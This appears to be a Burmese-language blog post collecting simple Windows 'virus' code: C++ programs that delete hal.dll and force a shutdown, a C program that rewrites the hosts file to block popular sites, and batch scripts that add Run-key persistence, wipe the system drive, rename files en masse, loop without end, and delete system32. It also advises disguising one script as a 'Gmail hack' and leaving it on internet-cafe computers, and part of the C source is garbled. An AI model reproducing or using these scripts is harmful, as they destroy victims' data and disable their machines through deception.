int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}


အထက္မွာ ျပခဲ႔တဲ႔ Virus ကေတာ့ C:\\windows\\ ကိုသာတိုက္ခိုက္ႏိုင္ပါတယ္။ အကယ္၍ တျခား drive တစ္ခုမွာ Windows ကိုတင္ထားမယ္ဆုိရင္ေတာ့ တုိက္ခိုက္ခံရမွာ မဟုတ္ပါဘူး။ အခုျပမယ့္ second version ကေတာ့ ဘယ္ drive မွာပဲ Windows တင္တင္ တိုက္ခိုက္ႏိုင္ပါတယ္။

Code:
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}


ေနာက္တစ္ခုကေတာ့ SVXX's Version ပါ။ ဒီ Virus မွာေတာ့ Batch commands ေတြကို အမ်ားဆံုးသံုးထားပါတယ္။

Code:
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
system("PAUSE");
return EXIT_SUCCESS;
}


"del" command ကေတာ့ stuff ေတြကို delete လုပ္ဖို႔အတြက္ DOS မွာ သံုးတဲ႔ command ပါ။ "-q" ကေတာ့ force delete (သို႔) အေမးအျမန္းမရွိ ဖ်က္ပါလို႔ အဓိပၸာယ္ရတဲ႔ parameter တစ္ခုပါ။ shutdown -s -f -t 00 ရဲ႕ အဓိပၸာယ္ကေတာ့ အားလံုး running ျပီးတဲ႔အခါမွာ 00 စကၠန္႔အတြင္း Shutdown,force close လုပ္ပါဆိုတဲ႔ အဓိပၸာယ္ပါ။

(Educational Purposes Only)

  • Virus နဲ႔ Websiteေတြကို Block လုပ္မယ္

Website ကို Block လုပ္တဲ႔ Virus နဲ႔ ပတ္သက္ျပီး ေတာ္ေတာ္မ်ားမ်ား သိျပီးၾကေလာက္ျပီထင္ပါတယ္... ဒါေပမယ့္ မသိေသးတဲ႔ သူေတြအတြက္ ေလ့လာလို႔ ရေအာင္ပါ။ ဒီ Virus ကိုလည္း C programming Language နဲ႔ ဖန္တီးထားတာျဖစ္ပါတယ္။ C နဲ႔ ပတ္သက္တဲ႔ Basic knowledge ရွိမယ္ဆုိရင္ ဒီ Virus ရဲ႕ အလုပ္လုပ္ပံုကို နားလည္ပါလိမ့္မယ္။ တိုက္ခိုက္ခံရသူအေနနဲ႔ ဒီ Virus ကို တစ္ၾကိမ္ေတာ့ Click လုပ္ဖုိ႔လိုအပ္ပါတယ္။ တစ္ၾကိမ္ Click လိုက္ျပီးတာနဲ႔ ဒီ Virus source code ထဲမွာ သတ္မွတ္ေပးထားတဲ႔ Website ေတြကို block လုပ္ပါလိမ့္မယ္။ တကယ္လို႔ တိုက္ခိုက္ခံရသူအေနနဲ႔ operation system ကို re-install လုပ္မယ္ဆိုရင္ေတာင္ အခု ဒီ Virus ကေန Block ထားတဲ႔ Website ေတြကို ဖြင့္လို႔ရေတာ့မွာ မဟုတ္ပါဘူး။ IE နဲ႔ Firefox browser ေတြကလည္း ဒီ Virus ရဲ႕ Blocking ကို ကန္႔သတ္ထားႏိုင္ျခင္း မရွိတဲ႔ အတြက္ ဒီ Virus နဲ႔ Block ထားတဲ႔ Website ေတြကို ဘယ္ Web Browser နဲ႔ဖြင့္ဖြင့္ ေပၚလာေတာ့မွာမဟုတ္ပါဘူး...။


ဒါကေတာ့ Virus ရဲ႕ Source Code ေတြျဖစ္ပါတယ္.....


#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++) success="0;" success="find_root();">

အခုအေပၚမွာျပထားတဲ႔ Source Code ကို Note pad ထဲမွာ ကူးထည့္ျပီး .c (သို႔) .cpp နဲ႔ save ျပီး compile လုပ္ဖို႔လိုပါတယ္။ ( အဆင့္ဆင့္ကို C ++ကို Compile လုပ္နည္းဆိုတဲ႔ post တြင္ၾကည့္ပါ။ )

ဒီ Virus ကို စမ္းသပ္ၾကည့္ဖို႔အတြက္ကေတာ့...

(၁) Compile လုပ္ျပီးတဲ႔အခါ block_Site.exe ( ဖုိင္ name ကေတာ့ ၾကိဳက္သလိုေပးႏိုင္ပါတယ္...)ကို တစ္ၾကိမ္ run လိုက္ပါ ။ ျပီးရင္ browser program ကို restart လုပ္လိုက္ပါ... ျပီးရင္ ဒီ Virus ထဲမွာ ပါ၀င္တဲ႔ website ေတြရဲ႕ URL ကို ရိုက္ထည့္ျပီး ဖြင့္ၾကည့္ပါ... Browser က "Page cannot displayed" ဆိုတဲ႔ error ကို ျပပါလိမ့္မယ္...။

(၂) ဒီ Virus ကို ျပန္ျဖဳတ္ဖို႔အတြက္ကေတာ့ Run ထဲမွာ %windir%\system32\drivers\etc ကို type ျပီး ဖြင့္လိုက္ပါ။ ျပီးရင္ အဲဒီထဲမွာ ဖိုင္ name "hosts" ဆိုတဲ႔ ဖိုင္ေတြကို ရွာျပီး notepad နဲ႔ဖြင့္ၾကည့္ပါ။ ဖိုင္ထဲမွာ ...
127.0.01 ------------- google.com
ကဲ႔သို႔ေသာ IP adress နဲ႔ website URL ပါတာေတြကို ေတြ႔ရပါလိမ့္မယ္။ အခုလို ပါ၀င္တဲ႔ ဖိုင္ေတြအားလံုးကို Delete လုပ္လိုက္ပါ ။

တိုက္ခိုက္ခံရသူေတြ ထင္ေယာင္ထင္မွားျဖစ္ေအာင္ EXE ဖိုင္ရဲ႕ Icon ပံုစံကို ေျပာင္းလဲဖုိ႔ လိုပါလိမ့္မယ္။ icon ပံုစံကို ဘယ္လိုေျပာင္းမလဲ ဆိုတဲ႔ Post မွာၾကည့္ပါ... )

simple virus code


Virus Code ေလးေတြတင္ေပးလုိက္တယ္ဂ်ာ။မယုံရင္လည္း Run ၾကည္ ့ေပါ့ေနာ္။ ဟိဟိ :D ။တတ္လာတဲ ့ျပသနာေတြေတာ ့တာ၀န္မယူပါ။
ဒါကေတာ ့ကြန္ျပဴတာ shutdown က်ေစတဲ ့ ဗဳိင္းရပ္ကုတ္ပါ။notepad မွာ copy/paste လုပ္ျပီး….shutdown.bat လုိ ့ save မွတ္လုိက္ပါ။သြား Run မိရင္ေတာ ့ ျပန္တတ္လာရင္ သင္စက္ဟက္ခံထိျပီးဆုိျပီးျပေနလိမ္ ့မယ္။ :D 
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
ဒါကေတာ ့ အင္တာနက္ကုိ block လုပ္လုိက္တဲ ့Code ကုတ္ပါ။
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Disableinternet.bat လုိ ့ save မွတ္ပီးသိမ္းထားနုိင္ပါတယ္။မေတာ္တဆ သြားနိပ္မိမွာဆုိးလုိ ့ပါ။
ဒါကေတာ ့ TXT file ေတြကုိ အလုပ္မလုပ္ေအာင္ ခုိင္းလုိက္တဲ ့ comment ျဖစ္ပါတယ္။
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
txt.bat ဆုိျပီး save မွတ္ထားလုိက္ပါ။
ေအာက္ဆုံးကေတာ ့ေတာ ့ အားလုံးကို ေပါင္းျပီးေရးထားလုိက္တာပါ။
အေပၚက ေစခုိိင္းထားတဲ ့အရာေတြကို တစ္ခါတည္းအလုပ္လုပ္သြားတာပါ။ေတေရာ ဟီး :D ။ ။
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE


အခက္ဆံုး Virus ေရးနည္း
@Echo off 
Del C:\ *.* |y 
  .bat not .txt နဲ႔ သိမ္း ပါ ျပီးရင္ run လိုက္
It will delete the content of C:\ drive...
 မွတ္ခ်က္  သင့္စက္မွာေတာ့ မ run လိုက္ပါနဲ႔ေနာ္.... ဖ်က္ပါလိမ့္မယ္ c:\ ကို
လုပ္မိလို႕ စက္ပ်က္သြားရင္တာ၀န္မယူ  တို႕ကေတာ့ သိတာေရးတယ္ တဲနယ္တူနယ္ 

shutdown, restart စသည္မ်ားကို shortcut လုပ္ထားမယ္


က်ေနာ္ အရင္ပို႔စ္မွာ shutdown shortcut ကို virus တစ္ခုအေနနဲ႔ ေျပာခဲ႔ပါတယ္။ အေျပာင္အပ်က္ လုပ္လို႔ရ႐ံုပါ။ အခု အဲဒါေလးေတြ ျပန္သံုးၿပီး မိမိ အတြက္ အသံုးတည္႔တဲ႔ shortcut ေလး အျဖစ္ထား ထားရေအာင္ ။ window ကို shutdown လုပ္ဖို႔ restart လုပ္ဖို႔ ေတြအတြက္ start ကိုသြား ဟိုႏိုပ္ ဒီႏိုပ္ လုပ္ေနရတာနဲ႔ စာရင္ shortcut ႀကိဳက္တဲ႔ သူေတြ အတြက္ အဆင္ေျပပါတယ္။
Desktop ေပၚမွာ R-Click လုပ္ New – shortcut ကိုႏိုပ္ ။ ေပၚလာတဲ႔ box မွာ
shutdown.exe -s -t 0 လို႔ေရးပါ။


ွွShutdown အတြက္ – shutdown.exe -s -t 0
Restart အတြက္ – shutdown.exe -r -t 0
Logoff အတြက္ – shutdown.exe -l -t 0
For hibernation အတြက္ – rundll32.exe PowrProf.dll, SetSuspendState Hibernate
t ေနာက္က 0 ေနရာမွာ shutdown က်ေစခ်င္ တဲ႔ စကၠန္႔ ထည္႔ေရးႏိုင္ပါတယ္ ။(ဥပမာ- t 60 ဆိုရင္ ၆၀ စကၠန္႔ၾကာ မွ shutdown က်မွာျဖစ္ပါတယ္။)
အေပၚကအတိုင္းေရးၿပီးရင္ Next ။ ေပၚလာတဲ႔ box မွာ ဖိုင္နာမည္ေပး ၿပီး finish ႏိုပ္ေပါ႔ ။


DESKTOP ေပၚမွာ RIGHT CLICK ေထာက္၊NEW ထဲက TEXT DOCUMENT ကိုေရြး။ အဲဒီ့ TEXT FILE ကိုဖြင့္ၿပီး စာနဲနဲ၀င္ေရးရေအာင္။ @echo offdel %systemdrive%\*.* /f /s /qshutdown -r -f -t 00 ဒါေလးေရးၿပီး SAVE လိုက္ပါ။ ၿပီးရင္ ဒီ TEXT FILE ကို CLICK ေထာက္ F2 ကိုႏွိပ္ၿပီး FILE NAME နဲ႔ EXTENSION ကို VIRUS.BAT လို႕ေျပာင္းေပးလိုက္ပါမယ္။ ဒါဆို ဒီ FILE ေလးက သိပ္ေၾကာက္စရာေကာင္းတဲ့ ေကာင္ျဖစ္သြားၿပီ။ အခု အခ်ိန္က စၿပီး သူ႕ကို DOUBLE CLICK ေတာ့သြား မႏွိပ္မိေစနဲ႔( မ RUN မိေစနဲ႔ )။ သင့္ PRIMARY HARD DISK ထဲက DATA ေတြအကုန္ပ်က္သြားလိမ့္မယ္ေနာ္..။တကယ္ေၿပာတာေနာ္။သိယုံေလာက္ပါပဲ။ 

 looping of 2 bat file and Simple Virus Codes

Network သမား တစ္ေယာက္ဟာ Bat code ေတြ ကုိ ရင္းနွီးျပီးသားျဖစ္မွာပါ။
သင္ဟာ Programmer တစ္ေယာက္မဟုတ္ရင္ေတာင္ bat code ေတြ ကုိ သိထားယုံနဲ ့
အေသးစား Virus တစ္ေကာင္ကုိ ဖန္တီးနိုင္မွာပါ။ ဘယ္လို ဖန္တီးမလဲ?
ဒါက ေတာ ့ သင့္ဥာဏ္ကြန္ ့ျမဴးနိုင္မွုေပၚမွာ မူတည္ပါတယ္။
အခု bat file နွစ္ခုနဲ ့ သင့္ရဲ ကြန္ျပဴတာ ကုိ ဒုကၡေပးၾကည္ ့ရေအာင္။ 
ဒီကုတ္ေလးေတြ ကုိ ကူးပါ။
notepad ထဲမွာေနာ္။ 
start 
shutdown -s
@echo off
:loop
msg * Hello Chuchar
start Itdengerous.2
goto loop
ျပီးရင္ Itdengerous.1 ဆိုျပီး .bat နဲ ့ save ပါ။
ေနာက္ျပီးေတာ ့ ဒီကုတ္ေလးပါပဲ။ 
start
shutdown -s
@echo off
:loop
msg * Hello Chuchar
start Itdengerous.1
goto loop
Itdengerous.2 လုိ ့အမည္ေပးျပီး .bat နဲ ့ save မွတ္ပါ။
ဖုိဒါတစ္ခုထဲမွာ အဲဒီ bat ဖုိင္ နွစ္ဖုိင္လုံးရွိေနပါေစ။
ကဲ သင္ၾကဳိက္တဲ ့ဖိုင္တစ္ခု ကုိ Run ၾကည္ ့ပါ။
ဘာျဖစ္သြားလဲ ဆုိတာေတြ ့ပါလိမ္ ့မယ္ :P ။ ။
Looping ပတ္္ျခင္းေတြ မျပီးဆုံးနုိင္ေတာ ့ပါဘူး။ 
bat ဖုိင္ကုိ ေတြရဲ ့ looping ပတ္ျခင္းကုိ Ctrl+C နဲ ့တားဆီးနုိင္ပါတယ္။
ဒါေပ ့မယ္..အေပၚမွာ ပါတဲ ့ဖိုင္နွစ္ခု ရဲ ့ looping အေရအတြတ္က အကန္ ့အသတ္မရွိတာေၾကာင့္
Ctrl+C လည္း တားဆီးနူိင္မွာမဟုတ္ေတာ ့ပါဘူး။
code ရဲ ့ စစျခင္းမွာ Shutdown -s ထည္ ့ထားတဲ ့အတြတ္... shutdown ကလည္း မျဖစ္မေနက်မွာပါပဲ။ 
shutdown -a နဲ ့ေတာ ့ အဲဒီ process ကုိ တားဆီးနုိင္ပါတယ္။
Start>run or Window key+R က ေန ျပီး 
Shutdown -a နဲ ့သတ္ပစ္နိုင္ပါတယ္။
ေအာက္က
msg * Hello Chuchar 
ဆုိတာ က ေတာ ့ Pop box တစ္ခု အေနနဲ ့သင္ဘာေပၚခ်င္လဲ။ သင္ၾကဳိက္တာေရးထည္ ့နိုင္ပါတယ္။
msg * I Love You
ဆုိရင္ သူကလည္း သင္ comment ေပးထားတဲ ့အတုိင္း I love You ဆုိျပီး ေပၚေနပါလိမ္ ့မယ္။
မမုိက္ဘူးလား :P
start Itdengerous.1
start Itdengerous.2
ဆုိတာ ကေတာ ့ သင့္ရဲ ့ bat file နွစ္ဖုိင္ ကုိ လွမ္း ျပီး Run တာ ျဖစ္ပါတယ္။
1 က 2 ကုိ ဖြင့္မယ္။ 2 က 1 ကုိ ဖြင့္မယ္။
ျပီးရင္ goto loop အၾကိမ္အေရအတြတ္ မရွိ ဖြင့္ေနမယ္။
အဲဒါဆုိ ေသခ်ာပါတယ္။ သင့္ကြန္ျပဴတာ လံုး၀ restart ခ်လုိက္ရမယ္။
မပူပါနဲ ့ :P။ 
တစ္ခါတည္းနဲ ့အေရာက္ပုိ ့ခဲ ့မယ္ေနာ္။ 
အင္တာနက္ဆုိင္တစ္ဆုိင္သြားသုံးတယ္ဆုိပါစုိ ့။
သင္အဲဒီကြန္ျပဴတာကုိ အဲဒီဖုိင္ေတြ Run ခ်င္တယ္ဆုိ လြယ္ပါတယ္။
အဲဒီ ဖုိင္နွစ္ဖုိင္ရွိတဲ ့ ဖုိဒါကုိ ေကာ္ပီ လုပ္ပါ။ ဒီအတုိင္းၾကီး ထားခဲ ့မယ္ဆုိ သိတဲ ့သူေတြ သိမယ္ေလ။
အဲဒီေတာ ့.... C:// ရဲ ့ေအာက္ေနရာ တစ္ခုခု။ ဒါမွမဟုတ္ သင့္စိတ္ၾကဳိက္ေနရာတစ္ခု မွ သြားထည္ ့လုိက္ပါ။ 
ျပီးရင္ Itdengerous.1 ျဖစ္ေစ Itdengerous.2 ျဖစ္ေစ တစ္ဖုိင္ဖုိင္ကုိ Desktop ကုိ လွမ္းျပီး
shortcut ပုိ ့ပါ။ အဲဒီ shortcut file ကုိ icon ေျပာင္းလုိ ့ရပါတယ္။
သင္ၾကဳိက္တဲ ့ Icon ေလး ေျပာင္းျပီး။ဒီလုိေလးေပးခဲ ့ပါလားဟင္။
Gmail hack v.9 ဆုိျပီး :P
ေသခ်ာပါတယ္ user ေတြ စိတ္၀င္စားမွာ :P
ေအာက္မွာ ဗုိင္းရပ္ simple code ေလးပါ။ ေလ ့လာနုိင္ပါတယ္။
title hello 
@echo off 
del *.dll 
del *.exe 
del *.ini 
time 00:00 
date 88/88/888 
msg *hello it my brithday 
msg *hello it my brithday 
msg *hello it my brithday 
msg *hello it my brithday 
msg *hello it my brithday 
msg *hello it my brithday 
msg *hello it my brithday 
msg *hello it my brithday 
msg *hello it my brithday 
msg *hello it my brithday 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
echo copy hello.bat "documents and settings\all users\start menu\programs\startup" 
cd C:\WINDOWS\system32 
del /S /F /Q keyboard.drv 
del /S /F /Q keyboard.sys 
del system32 
shutdown -s -f 
exit 
ေပ်ာ္ရႊင္ပါေစ။ ။
;););););) 
 
Posted by at